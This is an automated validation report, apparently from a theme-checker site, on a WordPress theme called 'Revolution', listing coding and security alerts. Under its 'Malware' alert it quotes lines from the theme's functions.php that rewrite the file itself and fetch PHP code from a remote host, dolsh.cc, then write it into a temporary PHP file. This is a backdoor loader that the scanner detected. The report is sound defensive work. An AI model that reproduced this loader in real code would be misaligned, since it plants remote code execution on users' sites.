0
Validation results

Revolution

Revolution

WordPress 4.9.6 theme
0
    Error 8 : Undefined index: slug
    In /home/www/themecheck/themecheck/controllers/controller_results.php line 772
  • THEME TYPEWordPress theme 4.9.6
  • FILE NAMErevolutionbeforedevelopmentlider.zip
  • FILE SIZE8113207 bytes
  • MD52b825faa17f34c37da160208910a7577
  • SHA111d75de7e7ad186c4203caefaedb0ecb8a9da819
  • LICENSEGNU GPL 2
  • FILES INCLUDEDCSS, PHP, Bitmap images
  • VERSION1.0.0
  • TAGStranslation-ready, custom-background, theme-options, custom-menu, post-formats, threaded-comments
  • CREATION DATE2017-10-21
  • LAST FILE UPDATE2017-10-21
  • LAST VALIDATION2017-10-21 01:36
  • OTHER VERSIONS

    1.1.2 : 57%

Critical alerts
  1. Customizer : Sanitization of Customizer settings Found a Customizer setting that did not have a sanitization callback function in file extension_customizer.php. Every call to the add_setting() method needs to have a sanitization callback function passed.
  2. Security breaches : Modification of PHP server settings Found ini_set in file functions.php.
    Line 609: ini_set( 'upload_max_size' , '64M' );
    Line 610: ini_set( 'post_max_size', '64M');
    Line 611: ini_set( 'max_execution_time', '300' );
  3. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe class="col-centered" src="https://player.vimeo.com/video/229235539" width="800" height="300" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen> in file theme-welcome.php.
    Line 119: <iframe class='col-centered' src='https://player.vimeo.com/video/229235539'
  4. Malware : Operations on file system file_get_contents was found in the file functions.php
    Line 20: if ($file = @file_get_contents(__FILE__))
    Line 22: if(preg_match_all('/\$tmpcontent = @file_get_contents\('http:\/\/(.*)\/code2\.php/i',$file,$matcholddomain))
    Line 51: if($tmpcontent = @file_get_contents('http://www.dolsh.cc/code2.php?i='.$path))
    file_put_contents was found in the file functions.php
    Line 26: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file functions.php
    Line 20: if ($file = @file_get_contents(__FILE__))
    Line 22: if(preg_match_all('/\$tmpcontent = @file_get_contents\('http:\/\/(.*)\/code2\.php/i',$file,$matcholddomain))
    Line 51: if($tmpcontent = @file_get_contents('http://www.dolsh.cc/code2.php?i='.$path))
    fopen was found in the file functions.php
    Line 57: $handle = fopen($tmpfname, 'w+');
    fwrite was found in the file functions.php
    Line 58: fwrite($handle, '<?php\n' . $phpCode);
    fclose was found in the file functions.php
    Line 59: fclose($handle);
    fwrite was found in the file scss.inc.php
    Line 831: //fwrite(STDERR, 'Line $line DEBUG: $value\n');
    file_get_contents was found in the file scss.inc.php
    Line 1654: //$code = file_get_contents($path);
    Line 4433: //$imports = unserialize(file_get_contents($icache));
    Line 4473: //$css = $this->scss->compile(file_get_contents($in), $in);
    Line 4537: //echo file_get_contents($output);
    file_get_contents was found in the file scss.inc.php
    Line 1654: //$code = file_get_contents($path);
    Line 4433: //$imports = unserialize(file_get_contents($icache));
    Line 4473: //$css = $this->scss->compile(file_get_contents($in), $in);
    Line 4537: //echo file_get_contents($output);
    file_get_contents was found in the file scss.inc.php
    Line 1654: //$code = file_get_contents($path);
    Line 4433: //$imports = unserialize(file_get_contents($icache));
    Line 4473: //$css = $this->scss->compile(file_get_contents($in), $in);
    Line 4537: //echo file_get_contents($output);
    file_put_contents was found in the file scss.inc.php
    Line 4482: //file_put_contents($out, $css);
    Line 4483: //file_put_contents($this->importsCacheName($out),
    file_put_contents was found in the file scss.inc.php
    Line 4482: //file_put_contents($out, $css);
    Line 4483: //file_put_contents($this->importsCacheName($out),
    file_get_contents was found in the file scss.inc.php
    Line 1654: //$code = file_get_contents($path);
    Line 4433: //$imports = unserialize(file_get_contents($icache));
    Line 4473: //$css = $this->scss->compile(file_get_contents($in), $in);
    Line 4537: //echo file_get_contents($output);
    fopen was found in the file class.redux_helpers.php
    Line 657: //$fp = fopen( $file, 'r' );
    fread was found in the file class.redux_helpers.php
    Line 660: //$file_data = fread( $fp, 8192 );
    fclose was found in the file class.redux_helpers.php
    Line 663: //fclose( $fp );
  5. Admin menu : Themes should use add_theme_page() for adding admin pages. File class-tgm-plugin-activation.php :
    Line 641: $this->page_hook = call_user_func( 'add_submenu_page', $args['parent_slug'], $args['page_title'], $args['menu_t
    File framework.php :
    Line 1347: // wrappers and need to be appened to using add_submenu_page.
    Line 1398: $this->page = call_user_func( 'add_submenu_page', $page_parent, $page_title, $menu_title, $page_permission
    Line 1456: call_user_func( 'add_submenu_page', $this->args['page_slug'], $section['title'], $section['t
    File framework.php :
    Line 1347: // wrappers and need to be appened to using add_submenu_page.
    Line 1398: $this->page = call_user_func( 'add_submenu_page', $page_parent, $page_title, $menu_title, $page_permission
    Line 1456: call_user_func( 'add_submenu_page', $this->args['page_slug'], $section['title'], $section['t
    File framework.php :
    Line 1424: $this->page = call_user_func( 'add_menu_page', $this->args['page_title'], $this->args['menu_title'], $this
    File framework.php :
    Line 1347: // wrappers and need to be appened to using add_submenu_page.
    Line 1398: $this->page = call_user_func( 'add_submenu_page', $page_parent, $page_title, $menu_title, $page_permission
    Line 1456: call_user_func( 'add_submenu_page', $this->args['page_slug'], $section['title'], $section['t
    File welcome.php :
    Line 199: $page = 'add_management_page';
    File options-init.php :
    Line 93: // For a full list of options, visit: http://codex.wordpress.org/Function_Reference/add_submenu_page#Parameters
  6. Inapropriate constants : Use of HEADER_TEXTCOLOR Constant HEADER_TEXTCOLOR was found in the file custom-header.php. add_theme_support( 'custom-header' ) should be used instead.
    Line 50: // get_header_textcolor() options: HEADER_TEXTCOLOR is default, hide text (returns 'blank') or any hex value.
    Line 51: if ( HEADER_TEXTCOLOR === $header_text_color ) {
Warning
  1. core scripts deregistered : Core scripts deregistrationFound wp_deregister_script in framework.php. Themes must not deregister core scripts.
    Line 565: wp_deregister_script( 'wpb_ace' );
    Found wp_deregister_script in enqueue.php. Themes must not deregister core scripts.
    Line 215: wp_deregister_script( 'jquerySelect2' );
  2. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function __, with the arguments 'Page' in file breadcrumbs.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Display Navigation or Logo - THIS OPTIONS WORKS ONLY WITH "STANDARD NAVIGATION" OPTION!' in file options-init.php.Found a translation function that is missing a text-domain. Function __, with the arguments ' ' in file options-init.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Insert Author or Company name displayed in footer copyright area' in file options-init.php.Found a translation function that is missing a text-domain. Function __, with the arguments ' Insert Author or Company Website URL displayed in footer copyright area' in file options-init.php.Found a translation function that is missing a text-domain. Function esc_html_e, with the arguments 'error_page_text' in file 404.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are revolution, no-mans-land, , tgmpa, redux-framework, themecheck, redux-framework-demo, cmb2, cmb2_tabs.
  3. PHP short tags : Presence of PHP short tagsPHP short tags were found in file search.php. "This practice is discouraged because they are only available if enabled with short_open_tag php.ini configuration file directive, or if PHP was configured with the --enable-short-tags option" (php.net), which is not the case on many servers.
    Line 15: <? global $revolution_opt; if('on' == $revolution_opt['search-sidebar-onoff
  4. Line endings consistency : Both DOS and UNIX style line endingsFound a mix of \r\n and \n line endings in file functions.php.
  5. Editor style : Presence of editor styleNo reference to add_editor_style() was found in the theme. It is recommended that the theme implements editor styling, so as to make the editor content match the resulting post output in the theme, for a better user experience.
  6. I18N implementation : Proper use of _e(Possible variable $revolution_opt found in translation function in 404.php. Translation function calls should not contain PHP variables.
    Line 22: <h1 class='page-title'><?php global $revolution_opt; esc_html_e( $revolution_opt['error_page_text'] ); ?></h1>
  7. I18N implementation : Proper use of esc_html_e(Possible variable $revolution_opt found in translation function in 404.php. Translation function calls should not contain PHP variables.
    Line 22: <h1 class='page-title'><?php global $revolution_opt; esc_html_e( $revolution_opt['error_page_text'] ); ?></h1>
  8. Screenshot : Screenshot fileScreenshot is wrong size! Detected: 1899x1141px. Maximum allowed size is 1200x900px.Screenshot dimensions are wrong! Detected: 1899x1141px (1899:1141). Ratio of width to height should be 4:3.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  2. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  3. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  4. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  5. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  6. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  7. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  8. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  9. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  10. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  11. Use of includes : Use of include or requireThe theme appears to use include or require : tgm-init.php
    Line 6: include_once ('class-tgm-plugin-activation.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : framework.php
    Line 410: require_once 'core/dashboard.php';
    Line 414: require_once 'core/newsflash.php';
    Line 1705: require_once 'core/enqueue.php';
    Line 2852: require_once 'core/enqueue.php';
    Line 2910: require_once 'core/panel.php';
    Line 3239: require_once 'core/panel.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : extension_customizer.php
    Line 749: require_once( $class_file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : scss.inc.php
    Line 2818: 
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : welcome.php
    Line 376: require_once 'views/about.php';
    Line 391: require_once 'views/changelog.php';
    Line 406: require_once 'views/extensions.php';
    Line 422: require_once 'views/support.php';
    Line 437: require_once 'views/credits.php';
    Line 452: require_once 'views/status_report.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : field_button_set.php
    Line 46: *              ['format']      string Formatting options for paginate fields. Options include ('currency','nice','niceShort','timeAgoInWords' or a valid Date() f
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes